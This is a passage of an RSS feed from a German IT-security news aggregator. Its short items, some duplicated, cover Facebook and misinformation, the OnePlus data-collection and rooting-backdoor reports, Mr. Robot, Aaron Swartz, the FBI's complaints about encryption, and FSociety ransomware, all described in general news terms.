<description><![CDATA[Three executives from Facebook, Twitter, and YouTube appeared at Stanford to discuss free speech in the social media age, with one law professor raising concerns about how the online giants are curating their services.
All three tech executives talked about increasing transparency and authenticit...]]></description>
<link>https://tsecurity.de/de/308400/it-security-nachrichten/facebook-exec-admits-no-real-understanding-for-the-scope-of-fake-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/308400/it-security-nachrichten/facebook-exec-admits-no-real-understanding-for-the-scope-of-fake-news/</guid>
<pubDate>Sun, 06 May 2018 09:46:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Three executives from Facebook, Twitter, and YouTube appeared at Stanford to discuss free speech in the social media age, with one law professor raising concerns about how the online giants are curating their services.
All three tech executives talked about increasing transparency and authenticity. But all acknowledge that nothing is foolproof and political speech in particular is most difficult to regulate, if it should be at all. "That puts a lot of control in the hands of the companies sitting here in term of what kind of speech is allowed to have the global reach," said Juniper Downs, YouTube's global head of public policy and government relations. "That is a responsibility we take very seriously and something we owe to the public and a civil society...." 
Facebook is making information available on its platform to researchers to help understand the effect of Facebook usage on elections. Still, Facebook's Vice President of Public Policy Elliot Schrage urged caution. "There is no agreement whatsoever on the prevalence of false news and fake propaganda on our platform," he said. "We have no real understanding of what the scope of misinformation is." He suggested that despite these chaotic times, "I do think we should be pretty modest and circumspect in the approaches we take." Social media companies need to find creative ways to improve the spread of information, Schrage said. But it won't be easy. "No one company," he said, "is going to solve this problem."<p></p><div>
<a href="http://twitter.com/home?status=Facebook+Exec+Admits+'No+Real+Understanding'+for+the+Scope+of+Fake+News%3A+http%3A%2F%2Fbit.ly%2F2HTZBOz"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F18%2F05%2F05%2F0437244%2Ffacebook-exec-admits-no-real-understanding-for-the-scope-of-fake-news%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a href="http://plus.google.com/share?url=https://tech.slashdot.org/story/18/05/05/0437244/facebook-exec-admits-no-real-understanding-for-the-scope-of-fake-news?utm_source=slashdot&amp;utm_medium=googleplus"><img src="https://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>



</div><p><a href="https://tech.slashdot.org/story/18/05/05/0437244/facebook-exec-admits-no-real-understanding-for-the-scope-of-fake-news?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OnePlus Is Again Sending User Data To a Chinese Company Without User Consent]]></title>
<description><![CDATA[In October 2017, a researcher caught OnePlus silently collecting all sorts of data from its users. Now, a new report says that there's still a OnePlus app that can grab data from the phone and send it to servers in China without a user's knowledge or express consent. BGR reports: The French secur...]]></description>
<link>https://tsecurity.de/de/259757/it-security-nachrichten/oneplus-is-again-sending-user-data-to-a-chinese-company-without-user-consent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/259757/it-security-nachrichten/oneplus-is-again-sending-user-data-to-a-chinese-company-without-user-consent/</guid>
<pubDate>Sat, 27 Jan 2018 03:45:55 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In October 2017, a researcher caught OnePlus silently collecting all sorts of data from its users. Now, a new report says that there's still a OnePlus app that can grab data from the phone and send it to servers in China without a user's knowledge or express consent. BGR reports: The French security researcher hiding behind the name Elliot Alderson on Twitter detailed OnePlus's data collection practices back in October, and he has now discovered a strange file in the OnePlus clipboard app. A Badword.txt file contains various keywords, including "Chairman, Vice President, Deputy Director, Associate Professor, Deputy Heads, General, Private Message, shipping, Address, email," and others. The file is then duplicated in a zip file called pattern alongside six other .txt files. All these files are apparently used in "in an obfuscated package which seems to be an #Android library from teddymobile." Now, TeddyMobile is a Chinese company that works with plenty of smartphone makers from China. The company seems to be able to recognize words and numbers in text messages. And OnePlus is apparently sending your phone's IMEI number to a TeddyMobile server, too. It looks like the TeddyMobile package might be able to grab all sorts of data from a phone. Even bank numbers are apparently recognized. OnePlus has yet to issue a statement on the matter.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=OnePlus+Is+Again+Sending+User+Data+To+a+Chinese+Company+Without+User+Consent+%3A+http%3A%2F%2Fbit.ly%2F2DFT1c7"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F18%2F01%2F27%2F0013220%2Foneplus-is-again-sending-user-data-to-a-chinese-company-without-user-consent%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a class="nobg" href="http://plus.google.com/share?url=https://tech.slashdot.org/story/18/01/27/0013220/oneplus-is-again-sending-user-data-to-a-chinese-company-without-user-consent?utm_source=slashdot&amp;utm_medium=googleplus"><img src="https://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>



</div><p><a href="https://tech.slashdot.org/story/18/01/27/0013220/oneplus-is-again-sending-user-data-to-a-chinese-company-without-user-consent?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How To Watch Mr. Robot Season 3 Online (Kodi Streams Included)]]></title>
<description><![CDATA[The creepy, disturbing techno-future drama Mr. Robot is back for a third season, and it has been just as popular with both critics and fans as the previous two series. It’s a dark and uncomfortable drama about computer hacker Elliot and the political schemes of an anarcho terrorist group that he ...]]></description>
<link>https://tsecurity.de/de/259741/betriebssysteme/how-to-watch-mr-robot-season-3-online-kodi-streams-included/</link>
<guid isPermaLink="true">https://tsecurity.de/de/259741/betriebssysteme/how-to-watch-mr-robot-season-3-online-kodi-streams-included/</guid>
<pubDate>Fri, 26 Jan 2018 23:45:02 +0100</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The creepy, disturbing techno-future drama Mr. Robot is back for a third season, and it has been just as popular with both critics and fans as the previous two series. It’s a dark and uncomfortable drama about computer hacker Elliot and the political schemes of an anarcho terrorist group that he gets tangled up it, […]</p><p>Read <a rel="nofollow" href="https://www.addictivetips.com/media-streaming/watch-mr-robot-season-3-online/">How To Watch Mr. Robot Season 3 Online (Kodi Streams Included)</a> by <a rel="nofollow" href="https://www.addictivetips.com/author/georgina/">Georgina Jones</a> on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips - Tech tips to make you smarter</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NetzDG: Facebook will keine Meinungspolizei sein]]></title>
<description><![CDATA[Facebook wettert gegen das NetzDG. Vizechef Elliot Schrage legte auf der DLD-Konferenz in München dar, wie sich der Plattformbetreiber eine künftige Kontrolle von Hate Speech und Fake News vorstellen könne.]]></description>
<link>https://tsecurity.de/de/256916/it-nachrichten/netzdg-facebook-will-keine-meinungspolizei-sein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/256916/it-nachrichten/netzdg-facebook-will-keine-meinungspolizei-sein/</guid>
<pubDate>Sun, 21 Jan 2018 13:50:18 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Facebook wettert gegen das NetzDG. Vizechef Elliot Schrage legte auf der DLD-Konferenz in München dar, wie sich der Plattformbetreiber eine künftige Kontrolle von Hate Speech und Fake News vorstellen könne.]]></content:encoded>
</item>
<item>
<title><![CDATA[Calls to Action on the Fifth Anniversary of the Death of Aaron Swartz]]></title>
<description><![CDATA[On the fifth anniversary of the death of Aaron Swartz, EFF activist Elliot Harmon posted a remembrance:
When you look around the digital rights community, it's easy to find Aaron's fingerprints all over it. He and his organization Demand Progress worked closely with EFF to stop SOPA. Long before ...]]></description>
<link>https://tsecurity.de/de/253777/it-security-nachrichten/calls-to-action-on-the-fifth-anniversary-of-the-death-of-aaron-swartz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/253777/it-security-nachrichten/calls-to-action-on-the-fifth-anniversary-of-the-death-of-aaron-swartz/</guid>
<pubDate>Sun, 14 Jan 2018 22:46:13 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[On the fifth anniversary of the death of Aaron Swartz, EFF activist Elliot Harmon posted a remembrance:
When you look around the digital rights community, it's easy to find Aaron's fingerprints all over it. He and his organization Demand Progress worked closely with EFF to stop SOPA. Long before that, he played key roles in the development of RSS, RDF, and Creative Commons. He railed hard against the idea of government-funded scientific research being unavailable to the public, and his passion continues to motivate the open access community. Aaron inspired Lawrence Lessig to fight corruption in politics, eventually fueling Lessig's White House run... It's tempting to become pessimistic in the face of countless threats to free speech and privacy. But the story of the SOPA protests demonstrates that we can win in the face of seemingly insurmountable odds. 
He shares a link to a video of Aaron's most inspiring talk, "How We Stopped SOPA," writing that "Aaron warned that SOPA wouldn't be the last time Hollywood attempted to use copyright law as an excuse to censor the Internet... 'The enemies of the freedom to connect have not disappeared... We won this fight because everyone made themselves the hero of their own story. Everyone took it as their job to save this crucial freedom. They threw themselves into it. They did whatever they could think of to do.'" 
On the anniversary of Aaron's death, his brother Ben Swartz, an engineer at Twitch, wrote about his own efforts to effect change in ways that would've made Aaron proud, while Aaron's mother urged calls to Congress to continue pushing for reform to the Computer Fraud and Abuse Act. 
And there were countless other remembrances on Twitter, including one fro Cory Doctorow, who tweeted a link to Lawrence Lessig's analysis of the prosecution. And Lessig himself marked the anniversary with several posts on Twitter. "None should rest," reads one, "for still, there is no peace."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Calls+to+Action+on+the+Fifth+Anniversary+of+the+Death+of+Aaron+Swartz%3A+http%3A%2F%2Fbit.ly%2F2DwMWLR"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F18%2F01%2F14%2F2035217%2Fcalls-to-action-on-the-fifth-anniversary-of-the-death-of-aaron-swartz%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a class="nobg" href="http://plus.google.com/share?url=https://yro.slashdot.org/story/18/01/14/2035217/calls-to-action-on-the-fifth-anniversary-of-the-death-of-aaron-swartz?utm_source=slashdot&amp;utm_medium=googleplus"><img src="https://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>



</div><p><a href="https://yro.slashdot.org/story/18/01/14/2035217/calls-to-action-on-the-fifth-anniversary-of-the-death-of-aaron-swartz?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI klagt über verschlüsselte Handys – mal wieder]]></title>
<description><![CDATA[FBI-Chef Wray will mehr Handys durchleuchten. Unser Foto zeigt ein Beleuchtungsgeschäft eines Namensvetters. CC-BY 2.0 Elliot BrownAuf der International Conference on Cyber Security (ICCS) in New York hat FBI-Chef Christopher Wray beklagt, dass seine Behörde im Jahr 2017 knapp 7.800 Geräte wegen ...]]></description>
<link>https://tsecurity.de/de/252428/it-nachrichten/fbi-klagt-ueber-verschluesselte-handys-mal-wieder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/252428/it-nachrichten/fbi-klagt-ueber-verschluesselte-handys-mal-wieder/</guid>
<pubDate>Thu, 11 Jan 2018 13:36:20 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="860" height="484" src="https://cdn.netzpolitik.org/wp-upload/2018/01/christopher-wray-fbi-860x484.jpg" class="attachment-landscape-860 size-landscape-860 wp-post-image" alt="" srcset="https://cdn.netzpolitik.org/wp-upload/2018/01/christopher-wray-fbi-860x484.jpg 860w, https://cdn.netzpolitik.org/wp-upload/2018/01/christopher-wray-fbi-300x169.jpg 300w, https://cdn.netzpolitik.org/wp-upload/2018/01/christopher-wray-fbi-730x411.jpg 730w, https://cdn.netzpolitik.org/wp-upload/2018/01/christopher-wray-fbi-1200x675.jpg 1200w, https://cdn.netzpolitik.org/wp-upload/2018/01/christopher-wray-fbi-660x372.jpg 660w, https://cdn.netzpolitik.org/wp-upload/2018/01/christopher-wray-fbi-380x214.jpg 380w, https://cdn.netzpolitik.org/wp-upload/2018/01/christopher-wray-fbi-160x90.jpg 160w" sizes="(max-width: 860px) 100vw, 860px">FBI-Chef Wray will mehr Handys durchleuchten. Unser Foto zeigt ein Beleuchtungsgeschäft eines Namensvetters.<span class="media-license-caption"> <a class="" rel="license" target="_blank" href="http://creativecommons.org/licenses/by/2.0/deed.de">CC-BY 2.0</a> <a href="https://www.flickr.com/photos/ell-r-brown/4314193677/in/photolist-7zentB-8PeQLi-8PeVaR-8PeUqx-8PeQep-8PhY37-e2KUGY-aGdhZp-8PeTHM-8PePsR-7tMYZj-e6KFTa-8PeNEk-e3aESx-4ate1S-7zen36-e2rzF5-5Z9D31-e6RjWS-e6RjAb-VfBCRJ-fjE3Vm-7zezBi-9hQPcB-F9p4tA-22eyHMp-fjpPCD-e3aDZV-fjDRys-awZHm9-7zikzj-fjDPmN-fjDVaQ-Wg9dU4-8E7jxK-fjDQqd-je6s1t-fjDWiN-fjDYx9-fjpMbc-en8fTy-fjpJ1e-fjE1P9-dp6GS5-fjE2Xh-enMDUd-YaEYm9-6wQYHo-UESMcR-GrAYWB">Elliot Brown</a></span>Auf der International Conference on Cyber Security (ICCS) in New York hat FBI-Chef Christopher Wray beklagt, dass seine Behörde im Jahr 2017 knapp 7.800 Geräte wegen Verschlüsselung nicht knacken konnte. Es handle sich dabei um etwa die Hälfte aller Geräte, für die dem FBI eine rechtliche Grundlage zur Durchsuchung vorlagen. In seiner Rede forderte Wray […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Another Shady App Found Pre-Installed on OnePlus Phones that Collects System Logs]]></title>
<description><![CDATA[The OnePlus Saga Continues…

Just a day after the revelation of the hidden Android rooting backdoor pre-installed on most OnePlus smartphones, a security researcher just found another secret app that records tons of information about your phone.

Dubbed OnePlusLogKit, the second pre-installed has...]]></description>
<link>https://tsecurity.de/de/229730/it-security-nachrichten/another-shady-app-found-pre-installed-on-oneplus-phones-that-collects-system-logs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/229730/it-security-nachrichten/another-shady-app-found-pre-installed-on-oneplus-phones-that-collects-system-logs/</guid>
<pubDate>Thu, 16 Nov 2017 13:01:04 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The OnePlus Saga Continues…

Just a day after the revelation of the hidden Android rooting backdoor pre-installed on most OnePlus smartphones, a security researcher just found another secret app that records tons of information about your phone.

Dubbed OnePlusLogKit, the second pre-installed has been discovered by the same Twitter user who goes by the pseudonym "Elliot Alderson" and<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheHackersNews?a=w_qbcMnoFDQ:oK1dpHzZU4c:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheHackersNews?d=yIl2AUoC8zA" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/TheHackersNews/~4/w_qbcMnoFDQ" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[OnePlus Phones Come Preinstalled With a Factory App That Can Root Devices]]></title>
<description><![CDATA[Catalin Cimpanu, writing for BleepingComputer: Some OnePlus devices, if not all, come preinstalled with an application named EngineerMode that can be used to root the device and may be converted into a fully-fledged backdoor by clever attackers. The app was discovered by a mobile security researc...]]></description>
<link>https://tsecurity.de/de/228741/it-security-nachrichten/oneplus-phones-come-preinstalled-with-a-factory-app-that-can-root-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/228741/it-security-nachrichten/oneplus-phones-come-preinstalled-with-a-factory-app-that-can-root-devices/</guid>
<pubDate>Tue, 14 Nov 2017 16:01:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Catalin Cimpanu, writing for BleepingComputer: Some OnePlus devices, if not all, come preinstalled with an application named EngineerMode that can be used to root the device and may be converted into a fully-fledged backdoor by clever attackers. The app was discovered by a mobile security researcher who goes online by the pseudonym of Elliot Alderson -- the name of the main character in the Mr. Robot TV series. Speaking to Bleeping Computer, the researcher said he started investigating OnePlus devices after a story he saw online last month detailing a hidden stream of telemetry data sent by OnePlus devices to the company's servers.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=OnePlus+Phones+Come+Preinstalled+With+a+Factory+App+That+Can+Root+Devices%3A+http%3A%2F%2Fbit.ly%2F2AIXx4s"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F17%2F11%2F14%2F140250%2Foneplus-phones-come-preinstalled-with-a-factory-app-that-can-root-devices%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a class="nobg" href="http://plus.google.com/share?url=https://yro.slashdot.org/story/17/11/14/140250/oneplus-phones-come-preinstalled-with-a-factory-app-that-can-root-devices?utm_source=slashdot&amp;utm_medium=googleplus"><img src="https://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>



</div><p><a href="https://yro.slashdot.org/story/17/11/14/140250/oneplus-phones-come-preinstalled-with-a-factory-app-that-can-root-devices?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OnePlus Left A Backdoor That Allows Root Access Without Unlocking Bootloader]]></title>
<description><![CDATA[Another terrible news for OnePlus users.

Just over a month after OnePlus was caught collecting personally identifiable information on its users, the Chinese smartphone company has been found leaving a backdoor on almost all OnePlus handsets.

A Twitter user, who goes by the name "Elliot Anderson...]]></description>
<link>https://tsecurity.de/de/228512/it-security-nachrichten/oneplus-left-a-backdoor-that-allows-root-access-without-unlocking-bootloader/</link>
<guid isPermaLink="true">https://tsecurity.de/de/228512/it-security-nachrichten/oneplus-left-a-backdoor-that-allows-root-access-without-unlocking-bootloader/</guid>
<pubDate>Tue, 14 Nov 2017 11:15:57 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Another terrible news for OnePlus users.

Just over a month after OnePlus was caught collecting personally identifiable information on its users, the Chinese smartphone company has been found leaving a backdoor on almost all OnePlus handsets.

A Twitter user, who goes by the name "Elliot Anderson" (named after Mr. Robot's main character), discovered a backdoor (an exploit) in all OnePlus<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheHackersNews?a=j5do4XoDwTs:plwr1Z7snaw:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheHackersNews?d=yIl2AUoC8zA" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/TheHackersNews/~4/j5do4XoDwTs" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[One in Five of Us May 'Hear' Flashes of Light]]></title>
<description><![CDATA[One in five people is affected by a synaesthesia-like phenomenon in which visual movements or flashes of light are "heard" as faint sounds, according to scientists. From a report on The Guardian: The findings suggest that far more people than initially thought experience some form of sensory cros...]]></description>
<link>https://tsecurity.de/de/113915/it-security-nachrichten/one-in-five-of-us-may-hear-flashes-of-light/</link>
<guid isPermaLink="true">https://tsecurity.de/de/113915/it-security-nachrichten/one-in-five-of-us-may-hear-flashes-of-light/</guid>
<pubDate>Wed, 18 Jan 2017 15:15:38 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[One in five people is affected by a synaesthesia-like phenomenon in which visual movements or flashes of light are "heard" as faint sounds, according to scientists. From a report on The Guardian: The findings suggest that far more people than initially thought experience some form of sensory cross-wiring -- which could explain the appeal of flashing musical baby toys and strobed lighting at raves. Elliot Freeman, a cognitive neuroscientist at City University and the study's lead author, said: "A lot of us go around having senses that we do not even recognise." More florid forms of synaesthesia, in which disparate sensory experiences are blended, are found in only about 2-4% of the population. To a synaesthete, the number seven might appear red, or the name Wesley might "taste" like boiled cabbage, for instance. The latest work -- only the second published on the phenomenon -- suggests that many more of us experience a less intrusive version of the condition in which visual movements or flashes are accompanied by an internal soundtrack of hums, buzzes or swooshes. Since movements are very frequently accompanied by sounds in everyday life, the effect is likely to be barely discernible.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=One+in+Five+of+Us+May+'Hear'+Flashes+of+Light%3A+http%3A%2F%2Fbit.ly%2F2k3XVFY"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F17%2F01%2F18%2F1343236%2Fone-in-five-of-us-may-hear-flashes-of-light%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a class="nobg" href="http://plus.google.com/share?url=https://science.slashdot.org/story/17/01/18/1343236/one-in-five-of-us-may-hear-flashes-of-light?utm_source=slashdot&amp;utm_medium=googleplus"><img src="http://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>                                                                                                                                                                              



</div><p><a href="https://science.slashdot.org/story/17/01/18/1343236/one-in-five-of-us-may-hear-flashes-of-light?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[One in Five of Us May 'Hear' Flashes of Light]]></title>
<description><![CDATA[One in five people is affected by a synaesthesia-like phenomenon in which visual movements or flashes of light are "heard" as faint sounds, according to scientists. From a report on The Guardian: The findings suggest that far more people than initially thought experience some form of sensory cros...]]></description>
<link>https://tsecurity.de/de/113915/it-security-nachrichten/one-in-five-of-us-may-hear-flashes-of-light/</link>
<guid isPermaLink="true">https://tsecurity.de/de/113915/it-security-nachrichten/one-in-five-of-us-may-hear-flashes-of-light/</guid>
<pubDate>Wed, 18 Jan 2017 15:15:38 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[One in five people is affected by a synaesthesia-like phenomenon in which visual movements or flashes of light are "heard" as faint sounds, according to scientists. From a report on The Guardian: The findings suggest that far more people than initially thought experience some form of sensory cross-wiring -- which could explain the appeal of flashing musical baby toys and strobed lighting at raves. Elliot Freeman, a cognitive neuroscientist at City University and the study's lead author, said: "A lot of us go around having senses that we do not even recognise." More florid forms of synaesthesia, in which disparate sensory experiences are blended, are found in only about 2-4% of the population. To a synaesthete, the number seven might appear red, or the name Wesley might "taste" like boiled cabbage, for instance. The latest work -- only the second published on the phenomenon -- suggests that many more of us experience a less intrusive version of the condition in which visual movements or flashes are accompanied by an internal soundtrack of hums, buzzes or swooshes. Since movements are very frequently accompanied by sounds in everyday life, the effect is likely to be barely discernible.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=One+in+Five+of+Us+May+'Hear'+Flashes+of+Light%3A+http%3A%2F%2Fbit.ly%2F2k3XVFY"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F17%2F01%2F18%2F1343236%2Fone-in-five-of-us-may-hear-flashes-of-light%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a class="nobg" href="http://plus.google.com/share?url=https://science.slashdot.org/story/17/01/18/1343236/one-in-five-of-us-may-hear-flashes-of-light?utm_source=slashdot&amp;utm_medium=googleplus"><img src="http://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>                                                                                                                                                                              



</div><p><a href="https://science.slashdot.org/story/17/01/18/1343236/one-in-five-of-us-may-hear-flashes-of-light?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tonight Mr. Robot is Going to Reveal ‘Dream Device For Hackers’]]></title>
<description><![CDATA[Mr. Robot is the rare show that provides a realistic depiction of hacks and vulnerabilities that are at the forefront of cyber security. This is the reason it’s been the most popular TV show of its kind.

Throughout season 1 and season 2, we have seen that connected devices are the entry point of...]]></description>
<link>https://tsecurity.de/de/66224/it-security-nachrichten/tonight-mr-robot-is-going-to-reveal-dream-device-for-hackers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/66224/it-security-nachrichten/tonight-mr-robot-is-going-to-reveal-dream-device-for-hackers/</guid>
<pubDate>Thu, 01 Sep 2016 12:00:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mr. Robot is the rare show that provides a realistic depiction of hacks and vulnerabilities that are at the forefront of cyber security. This is the reason it’s been the most popular TV show of its kind.

Throughout season 1 and season 2, we have seen that connected devices are the entry point of choice of Elliot and fsociety to breach networks and traditional security controls.


Pwn Phone On<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheHackersNews?a=cvSr_WzhO2s:nTMBAvYVv3g:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheHackersNews?d=yIl2AUoC8zA" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/TheHackersNews/~4/cvSr_WzhO2s" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Tonight Mr. Robot is Going to Reveal ‘Dream Device For Hackers’]]></title>
<description><![CDATA[Mr. Robot is the rare show that provides a realistic depiction of hacks and vulnerabilities that are at the forefront of cyber security. This is the reason it’s been the most popular TV show of its kind.

Throughout season 1 and season 2, we have seen that connected devices are the entry point of...]]></description>
<link>https://tsecurity.de/de/66224/it-security-nachrichten/tonight-mr-robot-is-going-to-reveal-dream-device-for-hackers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/66224/it-security-nachrichten/tonight-mr-robot-is-going-to-reveal-dream-device-for-hackers/</guid>
<pubDate>Thu, 01 Sep 2016 12:00:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mr. Robot is the rare show that provides a realistic depiction of hacks and vulnerabilities that are at the forefront of cyber security. This is the reason it’s been the most popular TV show of its kind.

Throughout season 1 and season 2, we have seen that connected devices are the entry point of choice of Elliot and fsociety to breach networks and traditional security controls.


Pwn Phone On<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheHackersNews?a=cvSr_WzhO2s:nTMBAvYVv3g:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheHackersNews?d=yIl2AUoC8zA" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/TheHackersNews/~4/cvSr_WzhO2s" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[FSociety Ransomware Is Here, But It's Pretty Lame]]></title>
<description><![CDATA[Fans of the Mr. Robot TV show would be glad to know that real-life crooks are taking inspiration from the TV series, and are now using the FSociety name and logo to develop a ransomware around this brand.

Mr. Robot is a USA Network TV show that revolves around the life of Elliot, a talented secu...]]></description>
<link>https://tsecurity.de/de/62387/it-security/fsociety-ransomware-is-here-but-its-pretty-lame/</link>
<guid isPermaLink="true">https://tsecurity.de/de/62387/it-security/fsociety-ransomware-is-here-but-its-pretty-lame/</guid>
<pubDate>Fri, 19 Aug 2016 00:15:12 +0200</pubDate>
<category>📰 IT Security</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fans of the Mr. Robot TV show would be glad to know that real-life crooks are taking inspiration from the TV series, and are now using the FSociety name and logo to develop a ransomware around this brand.

Mr. Robot is a USA Network TV show that revolves around the life of Elliot, a talented security engineer that has an alter ego as Mr. Robot, the leader of the FSociety hacking crew.

The show, which deals with a lot more than hacking, got to a spectacular start, winning a Golden Globe for Best Television Series - Drama, for its first season.

Mr. Robot TV show dealt with ransomware at the start of season 2

The show is now well embedded in the infosec community, which respects it so much for the accuracy it depicts hacks and technical details that it nominated Marc Rogers, the security expert consulting on the show, to a Pwnie Award for Epic Achievement at this year's Black Hat security conference.

In the season two]]></content:encoded>
</item>
<item>
<title><![CDATA[FSociety Ransomware Is Here, But It's Pretty Lame]]></title>
<description><![CDATA[Fans of the Mr. Robot TV show would be glad to know that real-life crooks are taking inspiration from the TV series, and are now using the FSociety name and logo to develop a ransomware around this brand.

Mr. Robot is a USA Network TV show that revolves around the life of Elliot, a talented secu...]]></description>
<link>https://tsecurity.de/de/62387/it-security/fsociety-ransomware-is-here-but-its-pretty-lame/</link>
<guid isPermaLink="true">https://tsecurity.de/de/62387/it-security/fsociety-ransomware-is-here-but-its-pretty-lame/</guid>
<pubDate>Fri, 19 Aug 2016 00:15:12 +0200</pubDate>
<category>📰 IT Security</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fans of the Mr. Robot TV show would be glad to know that real-life crooks are taking inspiration from the TV series, and are now using the FSociety name and logo to develop a ransomware around this brand.

